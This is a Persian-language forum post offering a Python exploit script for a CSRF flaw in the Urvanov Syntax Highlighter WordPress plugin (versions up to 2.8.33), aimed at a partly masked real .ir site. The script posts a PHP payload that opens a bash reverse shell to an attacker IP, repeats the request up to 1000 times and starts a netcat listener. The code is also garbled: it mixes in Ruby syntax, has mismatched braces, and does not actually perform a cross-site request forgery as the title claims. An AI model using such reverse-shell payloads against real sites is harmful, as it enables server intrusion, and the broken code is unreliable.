SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Urvanov Syntax Highlighter <= 2.8.33 - Highlighting Blocks Mgt via CSRF

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Urvanov Syntax Highlighter <= 2.8.33 - Highlighting Blocks Mgt via CSRF

    کد:
    import requests import os import time # The target URL where the Urvanov Syntax Highlighter plugin is installed url = 'http://www.a*r*o*m.ir/wp-admin/admin-ajax.php' # Your PHP shell payload payload = ''' <?php exec('/bin/bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1\''); ?> ''' # Your attacker IP and port attacker_ip = 'ATTACKER_IP' attacker_port = ATTACKER_PORT headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } # Sending the exploit for i in range(1, 1000): data = { 'action': 'highlight_shortcode_editor_blocks', 'code': f'<pre>${i.to_s().rjust(4, "0")}.{payload}}</pre>' } response = requests.post(url, headers=headers, data=data) print(f'Attempt {i}: {response.text}') if response.text == 'ok': print(f'Shell uploaded at: {i.to_s().rjust(4, "0")}.php') break # Set up a listener on your attacker machine to catch the reverse shell os.system(f'nc -lvp {attacker_port}')
    [align=center][align=right]When danger lurks in unknown waters, we are there to help you swim[/align][/align]
صبر کنید ..
X